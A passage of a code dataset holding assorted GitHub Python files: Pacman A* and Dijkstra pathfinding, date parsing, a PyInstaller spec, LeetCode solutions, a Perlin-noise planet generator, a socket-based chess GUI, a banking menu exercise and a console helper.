visited.append(current)\r\n\r\n\r\n\r\n\r\nclass InformedSearch(object):\r\n '''\r\n Return Value:\r\n Description: Higher-level abstraction of important tools used within both Djikstra's algorithm and A* search.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n def __init__(self):\r\n '''\r\n Parameters:\r\n Return Value:\r\n Description: constructor method which produces an open set to track nodes to search, produces a dictionary to store all\r\n parents/predecessors of searched nodes so that a path can be returned, and a final path to return.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n self.open_set = PriorityQueue()\r\n self.node_history = {}\r\n self.path = []\r\n self.direction_history = []\r\n\r\n def construct_score_table(self, graph):\r\n '''\r\n Parameters: graph object\r\n Return Value: dictionary / hash map\r\n Description: produces a table with the same amount of entries as nodes in the graph and is filled with\r\n an infinity value for initialisation.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n score_table = {}\r\n for row in graph:\r\n for node in row:\r\n score_table[node] = float(\"inf\")\r\n\r\n return score_table\r\n\r\n\r\n def get_path(self, current):\r\n '''\r\n Parameters: node object current, the last node explored in the frontier.\r\n Return Value: array\r\n Description: backtracks through the hash map storing the parent of each node searched, this returns a path\r\n in reverse order so the resultant path must be flipped at the end of the procedure.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n self.path.append(current)\r\n while current in self.node_history:\r\n current = self.node_history[current]\r\n self.path.append(current)\r\n\r\n path = [[node, direction] for node, direction in zip(self.path[::-1], self.direction_history[::-1])] # pair each node with its direction rather than taking a cartesian product\r\n \r\n return path\r\n\r\n\r\n\r\n\r\nclass Astar(InformedSearch):\r\n '''\r\n Parameters: inherits from InformedSearch\r\n Return Value:\r\n Description: Class which encapsulates the A* search algorithm, important tools and implementation.\r\n 
Author:\r\n Creation Date:\r\n '''\r\n def __init__(self, source, target):\r\n super().__init__()\r\n self.source = source\r\n self.target = target\r\n\r\n @staticmethod\r\n def heuristic1(current, target):\r\n return abs(current.pos.x - target.pos.x) + abs(current.pos.y - target.pos.y)\r\n\r\n @staticmethod\r\n def heuristic2(current, target):\r\n #return Node((current.row - target.row), (current.col - target.col)).pos.magnitude\r\n return Vector(current.col - target.col, current.row - target.row).magnitude_squared()\r\n\r\n\r\n def run(self, graph):\r\n print(self.source, self.target)\r\n g_score, f_score = self.construct_score_table(graph), self.construct_score_table(graph)\r\n g_score[self.source] = 0\r\n f_score[self.source] = self.heuristic2(self.source, self.target)\r\n self.open_set.put([self.source, f_score[self.source]])\r\n\r\n while not self.open_set.is_empty():\r\n current = self.open_set.get()\r\n if current == self.target:\r\n return self.get_path(current)\r\n\r\n for direction, node in current.adjacent_nodes.items():\r\n if node == None:\r\n continue\r\n\r\n else:\r\n if g_score[current] + 1 < g_score[node]:\r\n self.node_history[node] = current\r\n self.direction_history.append(direction)\r\n g_score[node] = g_score[current] + 1\r\n f_score[node] = g_score[current] + 1 + self.heuristic2(node, self.target)\r\n if node not in [i[0] for i in self.open_set.queue]:\r\n self.open_set.put([node, f_score[node]])\r\n\r\n return False\r\n\r\n\r\nclass Djikstra(InformedSearch):\r\n def __init__(self, source, target):\r\n super().__init__()\r\n self.source = source\r\n self.target = target\r\n\r\n\r\n\r\n def traverse(self, player):\r\n last_target = self.target\r\n while True:\r\n print(player.curr_direction)\r\n # step from the node reached so far, otherwise the walk never advances\r\n new_target = last_target.adjacent_nodes[player.curr_direction]\r\n if new_target is None:\r\n break\r\n\r\n else:\r\n last_target = new_target\r\n\r\n\r\n return last_target\r\n\r\n\r\n\r\n def run(self, graph, player):\r\n g_score = self.construct_score_table(graph)\r\n g_score[self.source] = 0\r\n self.open_set.put([self.source, g_score[self.source]])\r\n\r\n while not self.open_set.is_empty():\r\n current = self.open_set.get()\r\n if current == self.target:\r\n return self.get_path(current)\r\n\r\n for node in current.adjacent_nodes.values():\r\n if node == None:\r\n continue\r\n\r\n else:\r\n if g_score[current] + 1 < g_score[node]:\r\n self.node_history[node] = current\r\n g_score[node] = g_score[current] + 1\r\n if node not in [i[0] for i in self.open_set.queue]:\r\n self.open_set.put([node, g_score[node]])\r\n\r\n\r\n return False\r\n\r\n","repo_name":"ThomasMTurner/Pacman-Plus","sub_path":"algs.py","file_name":"algs.py","file_ext":"py","file_size_in_byte":8815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71402890066","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nfrom datetime import datetime,timedelta\nimport sys\nimport re\nimport pytz\n\ndef try_read(date, read_fn, **kwargs):\n try:\n output_date = read_fn(str(date), **kwargs)\n except Exception as e:\n raise ValueError(\"Date specified is not correct \" + str(date))\n return output_date\n\ndef date_with_timezone(date, date_format, tz):\n hours = int(tz[1:3])\n minutes = int(tz[3:5])\n mod_date = date.replace(tz, \"\")\n parsed_date = datetime.strptime(mod_date, date_format)\n if(tz[0]==\"+\"):\n return parsed_date - timedelta(hours=hours, minutes=minutes)\n else:\n return 
parsed_date + timedelta(hours=hours, minutes=minutes)\n\ndef parse_timezoned_date(date, date_format, tz):\n mod_date_format = date_format.replace(\"%z\",\"\")\n if (\"Z\" in date):\n return datetime.strptime(date.replace(\"Z\",\"\"), mod_date_format)\n elif (len(tz) > 0):\n return date_with_timezone(date, mod_date_format, tz[-1][0])\n\ndef custom_strptime(date,date_format):\n tz = re.findall(\"((\\+|-)[0-9]{4})\", date)\n contains_tz = (\"%z\" in date_format and ((\"Z\" in date) or (len(tz) > 0)))\n if(contains_tz and sys.version_info < (3,2,0)):\n return parse_timezoned_date(date, date_format, tz)\n elif(\"%z\" in date_format):\n if (date[-1] == 'Z'):\n # This is done automatically in Python3.7+ but not\n # in lower versions.\n date = date[:-1] + '+0000'\n return datetime.strptime(date, date_format).astimezone(pytz.UTC)\n else:\n return datetime.strptime(date, date_format)\n\ndef read_week_date(weekdate, **kwargs):\n # Input format: 1969W291\n iso_year = int(weekdate.split(\"W\")[0])\n iso_week = int(weekdate.split(\"W\")[1][:2])\n iso_day = int(weekdate.split(\"W\")[1][-1])\n return iso_year, iso_week, iso_day\n\ndef read_iso_week_date_no_day(weekdate, **kwargs):\n # Input format: 1969-W29\n iso_year = int(weekdate[:4])\n iso_week = int(weekdate.split(\"W\")[1][:2])\n return iso_year, iso_week\n\ndef read_iso_week_date(weekdate, **kwargs):\n # Input format: 1969-W29-1Z\n tz = kwargs.get(\"tz\")\n iso_year, iso_week = read_iso_week_date_no_day(weekdate)\n iso_day = int(weekdate.split(\"-\")[-1][0])\n timezone = weekdate.split(\"-\")[-1][1:] if tz else None\n return iso_year, iso_week, iso_day, timezone\n\ndef read_week_date_time(weekdatetime, **kwargs):\n # Input format: 1969W291T173639.592Z\n msecs = kwargs.get(\"msecs\")\n if msecs:\n pattern, reset_hour = \"%H%M%S.%f%z\", \"000000.000Z\"\n else:\n pattern, reset_hour = \"%H%M%S%z\", \"000000Z\"\n (iso_year, iso_week, iso_day) = read_week_date(weekdatetime.split(\"T\")[0])\n time = custom_strptime(weekdatetime.split(\"T\")[1], pattern)\n only_time = time - custom_strptime(reset_hour, pattern)\n return iso_year, iso_week, iso_day, only_time\n\ndef read_hypen_week_date_time(weekdatetime, **kwargs):\n # Input format: 969-W29-1T17:36:39.592Z\n msecs = kwargs.get(\"msecs\")\n if msecs:\n pattern, reset_hour = \"%H:%M:%S.%f%z\", \"00:00:00.000Z\"\n else:\n pattern, reset_hour = \"%H:%M:%S%z\", \"00:00:00Z\"\n weekdate = weekdatetime.split(\"T\")[0]\n (iso_year, iso_week, iso_day, tz) = \\\n read_iso_week_date(weekdate, tz=False)\n time = custom_strptime(weekdatetime.split(\"T\")[1], pattern)\n only_time = time - custom_strptime(reset_hour, pattern)\n return iso_year, iso_week, iso_day, only_time\n\ndef weekdate(iso_year, iso_week, iso_weekday):\n # Input format: 1969W291\n weekdate = str(iso_year) + \"W\" + str(iso_week).zfill(2)\n weekdate += str(iso_weekday)\n return weekdate\n\ndef date_from_week(week, iso_day=0):\n iso_format = \"%Y-%m-%d\"\n return custom_strptime(week.day(iso_day-1).isoformat(), iso_format)\n","repo_name":"kolron/cloud_project","sub_path":"venv/Lib/site-packages/bigml_chronos/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72680427666","text":"# -*- mode: python -*-\n\n#\n# Creates an .exe for the windows spotify version which has no dependencies\n# (ie. 
python and the python packages are all included)\n# To run this script and build you must first install pyinstaller and download\n# python and all the dependencies. It must be run on windows.\n\ndef extra_datas(mydir):\n def rec_glob(p, files):\n import os\n import glob\n for d in glob.glob(p):\n if os.path.isfile(d):\n files.append(d) \n rec_glob(\"%s/*\" % d, files)\n files = []\n rec_glob(\"%s/*\" % mydir, files)\n extra_datas = []\n for f in files:\n extra_datas.append((f, f, 'DATA'))\n return extra_datas\n\na = Analysis(['swisher\\winbox.py'],\n pathex=['swisher'],\n hiddenimports=[],\n hookspath=None)\n\na.datas += extra_datas('swisher\\\\templates')\na.datas += extra_datas('swisher\\\\assets')\na.datas += extra_datas('swisher\\\\winresources')\na.datas += extra_datas('mpd-0.17.4-win32')\n\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=1,\n name=os.path.join('build\\\\pyi.win32\\\\swisher', 'swisher.exe'),\n debug=False,\n strip=None,\n upx=True,\n icon='swisher\\\\winresources\\\\icon.ico',\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name=os.path.join('dist', 'swisher'))\n","repo_name":"thomasrynne/swisher","sub_path":"windows-build.spec","file_name":"windows-build.spec","file_ext":"spec","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
{"seq_id":"1042521354","text":"'''\nAuthor: Vladimir Vons \nCreated: 2022.09.04\nLicense: GNU, see LICENSE for more details\nDescription:\n'''\n\n\n#from .Sys_files import TApi as TApiEx\nfrom IncP.Api import TApiBase\nfrom IncP.Api.Sys_files import TApi as TApiEx\n\n\nclass TApi(TApiBase):\n Param = {\n 'path': '/'\n }\n\n async def Exec(self, aPath: str) -> str:\n Res = []\n ApiEx = TApiEx()\n Data = await ApiEx.Exec(aPath)\n for x in Data:\n Res.append('<a href=\"%s\">%s</a>' % (x, x)) # both placeholders are needed for the (x, x) pair\n return '<br>'.join(Res)\n\n async def Query(self, aData: dict) -> str:\n return await self.ExecDef(aData, ['path'])\n","repo_name":"VladVons/mpy-vRelay","sub_path":"src/IncP/Api/Sys_files_ls.py","file_name":"Sys_files_ls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"464628725","text":"import collections\nfrom typing import List\n\n\ndef singleNumber(nums: List[int]) -> List[int]:\n counter = collections.Counter(nums)\n return [num for num, cnt in counter.items() if cnt == 1]\n\n\nif __name__ == \"__main__\":\n nums = [1, 2, 1, 3, 2, 5]\n result = singleNumber(nums)\n correct_result = [3, 5]\n print(\"Expected:\")\n print(correct_result)\n print(\"Output:\")\n print(result)\n","repo_name":"giwankim/algo","sub_path":"leetcode/260-single-number-3/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"70052974225","text":"# Find All Anagrams in a String\n\"\"\"\n Create a counter for p string and go through the s string for n - m + 1 ie(len(s)-len(p)+1) times\n construct a window of len(p) size in S string and then create another counter of that window after that compare,\n if both counters are equal then add the index of S string in our ans or\n else remove the very first element of the window and add next element of S string to that window by this we'll maintain the size of the window\n\"\"\"\n\n# Time Complexity = O(n), n = len(s)\n# Space Complexity = O(m), m = len(p)\n\n\ns = \"cbaebabacd\"\np = \"abc\"\n\n\nfrom collections import Counter\n\n\ndef findAnagrams(s, p):\n n = len(s)\n m = len(p)\n ans = []\n p = Counter(p)\n\n for i in range(n - m + 1):\n if i == 0:\n count = Counter(s[:m])\n else:\n count[s[i - 1]] -= 1\n count[s[i + m - 1]] += 1\n\n if p == count:\n ans.append(i)\n\n return ans\n\n\nprint(findAnagrams(s, p))\n","repo_name":"DivyanshiChouksey/Data-Structure-Algorithm","sub_path":"112.Find All Anagrams in a String.py","file_name":"112.Find All Anagrams in a String.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4240035591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 25 23:36:38 2020\n\n@author: nia\n\"\"\"\n# draw a rectangle\ndef scquare(a, b):\n print ('scquare(%s, %s)' % (a, b))\n \n print('*' *b)\n for i in range(a-2):\n print('*'+ ' '*(b-2)+ '*')\n \n print('*' * b)\n\n# draw a triangle\n\ndef triangle(a,b):\n print ('triangle(%s, %s)' % (a, b))\n print('*')\n m=(b//(a-1))\n for i in range(1, a-1):\n print('*'*(i*m))\n print('*'*(b))\n \n \n \n\na=''\nwhile not a.isdigit ():\n a=input('Enter a= ')\na=int(a)\nb=''\nwhile not b.isdigit ():\n b=input('Enter b= ')\nb=int(b)\ns=scquare(a, b)\nv=triangle(a,b)\n\n\n","repo_name":"scretch28/ITEA","sub_path":"hw_3.py","file_name":"hw_3.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"14423851183","text":"menu = \"\"\"\n MEGASMART BANK\n______________________\n| |\n|[1] Deposit |\n|[2] Withdraw |\n|[3] Statement |\n|[4] Help |\n|[0] Exit |\n|____________________|\n\n| Enter your option:\n| => \"\"\"\n\nsaldo = 0\nlimite = 500\nextrato = \"\"\nnumero_saques = 0\nLIMITE_SAQUES = 3\n\nwhile True:\n\n opcao = int(input(menu))\n\n if 
opcao == 1:\n valor = float(input(\"\\n|Enter the deposit amount: \"))\n\n if valor > 0:\n saldo += valor\n extrato += f\"Deposit: R$ {valor:.2f}\\n\"\n \n else:\n print(\"|Operation failed! Invalid amount.|\")\n\n elif opcao == 2:\n valor = float(input(\"|Enter the withdrawal amount: \"))\n\n excedeu_saldo = valor > saldo\n excedeu_limite = valor > limite\n excedeu_saques = numero_saques >= LIMITE_SAQUES\n\n if excedeu_saldo:\n print('\\n|Operation failed! Insufficient balance.|')\n elif excedeu_limite:\n print('\\n|Operation failed! Withdrawal limit exceeded.|')\n elif excedeu_saques:\n print('\\n|Operation failed! Maximum number of withdrawals exceeded.|')\n elif valor > 0:\n saldo -= valor\n extrato += f\"Withdrawal: R$ {valor:.2f}\\n\"\n numero_saques += 1\n else:\n print('|Operation failed! The amount entered is invalid|')\n \n elif opcao == 3:\n print('\\n================ STATEMENT ================')\n print('No transactions have been made.' if not extrato else extrato)\n print('_________________________________________')\n print(f'\\nBalance: R$ {saldo:.2f}') \n print('=========================================')\n \n elif opcao == 4:\n print('================================================')\n print('Information')\n print('1. Maximum withdrawal amount: R$ 500.00')\n print('2. Maximum number of withdrawals: 3 per day')\n print('=> For more information contact your manager')\n print('================================================')\n\n elif opcao == 0:\n break\n \n else:\n print('|Invalid operation, please select the desired operation again.|')\n\n","repo_name":"joemily/sistema-bancario-simples-dio","sub_path":"projeto.py","file_name":"projeto.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41489385568","text":"import PIL, random, sys, argparse, math\nfrom PIL import Image, ImageDraw\nimport noise\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--width\", default=1500, type=int)\n parser.add_argument(\"--height\", default=1500, type=int)\n parser.add_argument(\"-s\", \"--scale\", default=200.0, type=float)\n parser.add_argument(\"-o\", \"--octaves\", default=6, type=int)\n parser.add_argument(\"-p\", \"--persistence\", default=.5, type=float)\n parser.add_argument(\"-l\", \"--lacunarity\", default=2.0, type=float)\n parser.add_argument(\"-b\", \"--base\", default=0, type=int)\n parser.add_argument(\"-md\", \"--max_distance\", default=900.0, type=float)\n parser.add_argument(\"-a\", \"--alter\", default=0, type=int)\n parser.add_argument(\"-pnw\", \"--planet_number_wide\", default=1, type=int)\n parser.add_argument(\"-pnh\", \"--planet_number_high\", default=1, type=int)\n parser.add_argument(\"-ps\", \"--planet_size\", default=1500, type=int)\n parser.add_argument(\"-oc\", \"--other_color\", default=0, type=int)\n args = parser.parse_args()\n\n random.seed()\n offset = random.randint(1, 100) * random.randint(1, 1000)\n\n width, height = args.width, args.height\n octaves = args.octaves\n persistence = args.persistence\n lacunarity = args.lacunarity\n scale = args.scale\n base = args.base\n alter = args.alter\n max_distance = args.max_distance\n planet_number_wide = args.planet_number_wide\n planet_number_high = args.planet_number_high\n planet_size = args.planet_size\n other_color = args.other_color\n\n pil_image = Image.new('RGBA', (planet_number_wide*planet_size, planet_number_high*planet_size))\n\n pixels = pil_image.load()\n # var rand = 
myArray[Math.floor(Math.random() * myArray.length)];\n # document.getElementById(\"color-text\").style.color = rand;\n colors_list = [(127, 199, 175), (218, 216, 167), (167, 219, 216), (237, 118, 112)]\n\n for col in range(pil_image.size[0]):\n for row in range(pil_image.size[1]):\n pixels[col, row] = (208, 200, 176)\n\n for col in range(0, pil_image.size[0], planet_size):\n for row in range(0, pil_image.size[1], planet_size):\n color_water = random.choice(colors_list)\n color_ground = random.choice(colors_list)\n while color_ground is color_water:\n color_ground = random.choice(colors_list)\n # pick a distinct accent colour; do not reuse the name other_color, which holds the command-line flag\n accent_color = random.choice(colors_list)\n while accent_color is color_water or accent_color is color_ground:\n accent_color = random.choice(colors_list)\n for i in range(col, col+planet_size):\n for j in range(row, row+planet_size):\n\n # Generates a value from -1 to 1\n pixel_value = noise.pnoise2((offset+i)/scale,\n (offset+j)/scale,\n octaves,\n persistence,\n lacunarity,\n width,\n height,\n base)\n distance_from_center = math.sqrt(math.pow((i - (col+(col+planet_size))/2), 2) + math.pow((j - (row+(row+planet_size))/2), 2))\n\n\n gradient_perc = distance_from_center/max_distance\n\n #pixel_value -= math.pow(gradient_perc, 3)\n #random.seed()\n\n if (distance_from_center < max_distance):\n if (other_color == 1 and int(pixel_value * 100.0) > 25):\n pixels[i, j] = accent_color\n elif (int(pixel_value * 100.0) > 5):\n pixels[i, j] = color_ground\n else:\n pixels[i, j] = color_water\n elif (distance_from_center < (max_distance + .03 * max_distance)):\n pixels[i, j] = (15, 15, 15)\n\n #region = pil_image.crop((500, 500, 1000, 1000))\n #pil_image.paste(region, (0, 0, 500, 500))\n pil_image.save('Examples/Planet-' + str(offset) + '-w-' + str(width) + '-h-' + str(height) + '.png')\n\n\nif __name__ == \"__main__\":\n main()\n\n # 52 minutes - Definitely my maybe\n # -> 1:07\n\n # watch endscreen -> credits\n","repo_name":"erdavids/Island-Generator","sub_path":"PlanetPerlin.py","file_name":"PlanetPerlin.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"}
{"seq_id":"42569493346","text":"import chess\nimport chess.svg\nimport random\nimport math\nfrom PyQt5.QtSvg import QSvgWidget\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nimport os\nimport sys\nimport timeit\n\nimport socket\n\n\nBUFFER_SIZE = 1024\n\n\nclass MainWindow(QWidget):\n def __init__(self, AIStart, socket: socket):\n super().__init__()\n self.boardSize = 800\n self.setGeometry(0, 0, self.boardSize, self.boardSize)\n self.AIStart = AIStart\n self.widgetSvg = QSvgWidget(parent=self)\n self.widgetSvg.setGeometry(0, 0, self.boardSize, self.boardSize)\n self.chessboard = chess.Board()\n self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n self.widgetSvg.load(self.chessboardSvg)\n self.chessMove = \"\"\n self.running = False\n self.socket = socket\n\n # self.revertMoveButton = QPushButton(text=\"Revert\")\n # self.revertMoveButton.move(900, 100)\n\n def mousePressEvent(self, event):\n if self.running:\n return\n if not self.AIStart:\n self.running = True\n if humanMove(self, event):\n AIMove(self.chessboard, self)\n\n self.AIsTurn = False\n self.running = False\n else:\n self.running = True\n if (humanMove(self, event)):\n AIMove(self.chessboard, self)\n self.running = False\n\n\ndef AIMove(chessboard: chess.Board, window: MainWindow):\n print(\"Receiving\")\n\n received = 
window.socket.recv(BUFFER_SIZE).decode() # decode the raw bytes received over the socket\n print(\"Got: \" + received)\n makeMove(chess.Move.from_uci(received), window)\n\n\ndef humanMove(self, event):\n if self.chessMove == \"\":\n self.chessMove = getSquare(\n event, (self.boardSize*0.075)/2, self.boardSize - (self.boardSize*0.075)/2)\n return False\n elif len(self.chessMove) == 2:\n self.chessMove = self.chessMove + \\\n getSquare(event, (self.boardSize*0.075)/2,\n self.boardSize - (self.boardSize*0.075)/2)\n\n if not legalMove(self.chessboard, self.chessMove):\n print(\"Invalid move\", self.chessMove)\n self.chessMove = \"\"\n return False\n\n # Human move\n print(\"Human move :\", self.chessMove)\n if len(list(self.chessboard.legal_moves)) == 0:\n print(\"White lost\")\n return False\n self.socket.send(self.chessMove.encode()) # sockets carry bytes, not str\n makeMove(chess.Move.from_uci(str(self.chessMove)), self)\n self.chessMove = \"\"\n return True\n\n\ndef getSquare(event, lowest, highest):\n separation = (highest - lowest) / 8\n x = event.pos().x()\n y = event.pos().y()\n y_line = get_column_letter(x, lowest, highest, separation)\n x_line = get_row_number(y, lowest, highest, separation)\n return y_line + str(x_line)\n\n\ndef get_column_letter(x, lowest, highest, separation):\n for i in range(0, 8):\n if x > lowest and x < highest and x > lowest and x < highest and x > lowest + separation * i and x < lowest + separation * (i + 1):\n return chr(97 + i)\n return \"\"\n\n\ndef get_row_number(y, lowest, highest, separation):\n for i in range(0, 8):\n if y > lowest and y < highest and y > lowest and y < highest and y > lowest + separation * i and y < lowest + separation * (i+1):\n return 8-i\n return \"\"\n\n\ndef makeMove(move: chess.Move, window: MainWindow):\n window.chessboard.push(chess.Move(\n from_square=move.from_square, to_square=move.to_square))\n\n if window.chessboard.is_check():\n window.chessboardSvg = chess.svg.board(\n window.chessboard,\n lastmove=move,\n check=window.chessboard.king(window.chessboard.turn)\n ).encode(\"UTF-8\")\n else:\n window.chessboardSvg = chess.svg.board(\n window.chessboard,\n lastmove=move,\n check=None\n ).encode(\"UTF-8\")\n window.widgetSvg.load(window.chessboardSvg)\n # window.update()\n window.repaint()\n\n\ndef evaluationFunction(board: chess.Board):\n\n if chess.Board.is_fifty_moves(board) or chess.Board.is_repetition(board):\n if board.turn == chess.WHITE:\n return 500\n else:\n return -500\n\n if len(list(board.legal_moves)) == 0:\n if board.turn == chess.BLACK:\n return -1000\n elif board.turn == chess.WHITE:\n return 1000\n\n pawnDiff = calcPieceDiff(chess.PAWN, board)\n knightDiff = calcPieceDiff(chess.KNIGHT, board) * 3\n bishopDiff = calcPieceDiff(chess.BISHOP, board) * 3\n rookDiff = calcPieceDiff(chess.ROOK, board) * 5\n queenDiff = calcPieceDiff(chess.QUEEN, board) * 9\n return pawnDiff + knightDiff + bishopDiff + rookDiff + queenDiff\n\n\ndef calcPieceDiff(piece: chess.PieceType, board: chess.Board) -> int:\n return len(chess.Board.pieces(board, piece, chess.BLACK)) - len(chess.Board.pieces(board, piece, chess.WHITE))\n\n# Could add checks\n\n\ndef sortMoveList(moves: chess.LegalMoveGenerator, board: chess.Board):\n attackers = []\n attackers_value = []\n nonAttackers = []\n for move in moves:\n valBefore = evaluationFunction(board=board)\n board.push(move)\n valafter = evaluationFunction(board=board)\n board.pop()\n if valBefore != valafter:\n # if len(attackers) > 1 :\n # diff = abs(valBefore - valafter)\n # for i in range(0, len(attackers)):\n # if diff > attackers_value[i]:\n # attackers_value.insert(i, 
diff)\n # attackers.insert(i, move)\n # break\n attackers.append(move)\n # attackers_value.append(diff)\n else:\n nonAttackers.append(move)\n\n return (attackers, nonAttackers)\n\n\ndef minMax(board: chess.Board, depth: int, prevMove: chess.Move, alpha: int, beta: int):\n\n result = sortMoveList(board.legal_moves, board)\n attackMoves = result[0]\n noAttackMoves = result[1]\n\n sortedMoves = []\n # Quiescence base case: capture search fully exhausted, no moves at all, or a draw by rule\n if depth == -1 or len(attackMoves) + len(noAttackMoves) == 0 or chess.Board.is_fifty_moves(board) or chess.Board.is_repetition(board):\n return (prevMove, evaluationFunction(board=board))\n # Quiescence continuation: at depth 0 keep searching capture moves only\n elif depth == 0 and len(attackMoves) != 0:\n sortedMoves = attackMoves\n # Regular base case: depth exhausted and no captures left to extend\n elif depth == 0:\n return (prevMove, evaluationFunction(board=board))\n # Regular continuation\n else:\n # Makes the algorithm pick attacks first\n sortedMoves = attackMoves + noAttackMoves\n\n # MAX\n if board.turn == chess.BLACK:\n value = -998\n bestMov = prevMove\n for mov in sortedMoves:\n board.push(mov)\n currentVal = minMax(board=board, depth=depth-1,\n prevMove=mov, alpha=alpha, beta=beta)[1]\n board.pop()\n if currentVal > value:\n value = currentVal\n bestMov = mov\n alpha = max(alpha, value)\n if value >= beta:\n break\n return (bestMov, value)\n # MIN\n elif board.turn == chess.WHITE:\n value = 999\n bestMov = prevMove\n for mov in sortedMoves:\n board.push(mov)\n currentVal = minMax(board=board, depth=depth-1,\n prevMove=mov, alpha=alpha, beta=beta)[1]\n board.pop()\n if currentVal < value:\n value = currentVal\n bestMov = mov\n beta = min(beta, value)\n if currentVal <= alpha:\n break\n\n return (bestMov, value)\n\n\ndef legalMove(board: chess.Board, move: str):\n found = False\n for m in list(board.legal_moves):\n mov_con = str(chess.Move.from_uci(str(m)))\n if move == mov_con:\n found = True\n break\n return found\n\n\nif __name__ == \"__main__\":\n\n TCP_IP = '192.168.10.158'\n TCP_PORT = 3030\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((TCP_IP, TCP_PORT))\n s.listen(1)\n\n conn, addr = s.accept()\n print('Connection address:', addr)\n\n app = QApplication([])\n AIstart = False\n if sys.argv[1] == \"white\":\n AIstart = True\n window = MainWindow(AIStart=AIstart, socket=conn)\n window.show()\n app.exec()\n","repo_name":"EliasNorgren/chessABalgo","sub_path":"GUIServer.py","file_name":"GUIServer.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16803675277","text":"from random import *\n\n\ndef task1():\n n, m = 1, randint(1, 100)\n print(n, m)\n for i in range(m):\n print(1, randint(-2, -1))\n\n\ndef task2():\n n, m = randint(2, 20), randint(90, 100)\n print(n, m)\n for i in range(m):\n a = randint(1, n)\n b = randint(-2, 0)\n if b == 0:\n b = randint(1, n-1)\n if b>=a:\n b = b+1\n print(a, b)\n\n\ntask1()\n","repo_name":"learnpm/code","sub_path":"apcs/10907/p2_testcases/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
{"seq_id":"72797624147","text":"'''Write a program that lets the user type in their name and then shows the user's name backwards using only uppercase letters 
and, MANDATORILY, a **repetition statement**. Hint: remember that the user may type upper or lower case letters when entering the name.'''\r\n\r\ndef main():\r\n # variable declarations\r\n nome = str(\"\")\r\n invertido = str(\"\")\r\n \r\n # read input\r\n nome = input().upper()\r\n \r\n # processing: build the reversed string with an explicit loop, as the exercise requires\r\n for ch in nome:\r\n invertido = ch + invertido\r\n \r\n # output\r\n print(f'{invertido}') \r\n return 0\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"saraivagustavo/LVPs","sub_path":"LVPs-Strings/lvpstrings2.py","file_name":"lvpstrings2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1986988493","text":"import sys\n\nfrom rich.console import Console\n\nfrom ..enums.terminal_out_file import TerminalOutFile\n\nRICH_CONSOLE: dict[TerminalOutFile, Console] = {}\n\n\ndef get_rich_console(out_file: TerminalOutFile, width: int, force_terminal: bool) -> Console:\n    \"\"\"\n    Get rich console, create if not exists\n\n    :param out_file: terminal out file\n    :param width: terminal width\n    :param force_terminal: force terminal\n    :return: rich console\n    \"\"\"\n\n    global RICH_CONSOLE\n\n    # check if rich console exists\n    if out_file not in RICH_CONSOLE:\n        # choose file\n        if out_file == TerminalOutFile.STDOUT:\n            file = sys.stdout\n        elif out_file == TerminalOutFile.STDERR:\n            file = sys.stderr\n        else:\n            file = sys.stderr\n\n        # create rich console\n        RICH_CONSOLE[out_file] = Console(file=file,\n                                         force_terminal=force_terminal,\n                                         width=width)\n\n    rich_handler = RICH_CONSOLE[out_file]\n\n    return rich_handler\n","repo_name":"JuliusKoenig/controllogger","sub_path":"src/controllogger/misc/get_rich_console.py","file_name":"get_rich_console.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
